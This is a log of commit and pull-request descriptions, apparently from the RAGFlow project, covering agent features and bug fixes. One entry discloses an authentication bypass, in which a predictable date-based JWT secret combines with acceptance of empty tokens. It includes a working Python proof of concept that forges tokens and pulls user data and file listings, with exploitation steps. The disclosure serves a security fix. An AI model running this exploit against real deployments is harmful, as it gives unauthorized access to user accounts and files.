Feat: Reference the output variable of the upstream operator #3221 (#8111)
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Enables the message operator form to reference the data defined by the begin operator #3221 (#8108)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Receive reply messages of different event types from the agent #3221 (#8100)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: single task executor getting all tasks from Redis queue (#7330)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop will keep
getting the tasks. This will lead to a single task executor with many
tasks in the pending state. Then we need to wait for the pending tasks
to get them back in the queue.
In first place, if we set the `MAX_CONCURRENT_TASKS` to X, then only X
tasks should be picked from the queue, and others should be left in the
queue for other `task_executors` or be picked after 1 of the spots in
the current executor gets free. This PR ensures this behavior.
The additional changes were due to the Ruff linting in pre-commit. But I
believe these are expected to keep the coding style.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
Fix(python-sdk): Add name filtering support to Dataset.list_documents() (#8090)
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Resolve JSON download errors in Document.download() (#8084)
### What problem does this PR solve?
An exception is thrown only when the json file has only two keys, `code`
and `message`. In other cases, response.content is returned normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 (#8083)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Feat: Convert the inputs parameter of the begin operator #3221 (#8081)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
now Streamning logic is not match with none streaming logic, which may
introduce down stream can not find upstream components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys
def exploit_ragflow(target):
# Generate token with predictable key
daily_key = str(date.today())
serializer = URLSafeTimedSerializer(secret_key=daily_key)
malicious_token = serializer.dumps("")
print(f"Target: {target}")
print(f"Secret key: {daily_key}")
print(f"Generated token: {malicious_token}\n")
# Test endpoints
endpoints = [
("/v1/user/info", "User profile"),
("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
]
auth_headers = {"Authorization": malicious_token}
for path, description in endpoints:
print(f"Testing {description}...")
response = requests.get(f"{target}{path}", headers=auth_headers)
if response.status_code == 200:
data = response.json()
if data.get("code") == 0:
print(f"SUCCESS {description} accessible")
if "user" in path:
user_data = data.get("data", {})
print(f" Email: {user_data.get('email')}")
print(f" User ID: {user_data.get('id')}")
elif "file" in path:
files = data.get("data", {}).get("files", [])
print(f" Files found: {len(files)}")
else:
print(f"Access denied")
else:
print(f"HTTP {response.status_code}")
print()
if __name__ == "__main__":
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh@asiroliu@cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Don't use ',' (U+FF0C) but ', ' (U+2C U+20) (#8063)
The Unicode codepoint ',' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Allow update conversation parameters and persist to database in completion (#8039)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix: Allow None value for parser_config in create_dataset SDK method (#8041)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Grammar and clarity improvements in prompt templates (#8023)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The category should work well, but the category's downstream seems to be
unable to get the upstream output.
Add the category's output as an attribute.
However, in base.py, there is logic
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
If goto this cases will not tried to get output from Category (but I do
not have full context about this if logic).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Feat: Construct RetrievalForm with original fields #3221 (#8012)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: sync test group to top pyproject.toml (#8015)
### What problem does this PR solve?
sync test group from sdk/python/pyproject.toml to top pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the synonym dictionary file with relevant time and date to
prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
Feat: Add the example component of the classification operator #3221 (#7986)
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Use one-way data flow to synchronize the form data to the canvas #3221 (#7977)
### What problem does this PR solve?
Feat: Use one-way data flow to synchronize the form data to the canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix: Unnecessary truncation in markdown parser (#7972)
### What problem does this PR solve?
Fix unnecessary truncation in markdown parser. So that markdown can work
perfectly like
[this](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576)
in #7824, supporting multiple special delimiters.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Update upload filename length limit from 128 to 256, which is aligned with os (#7971)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>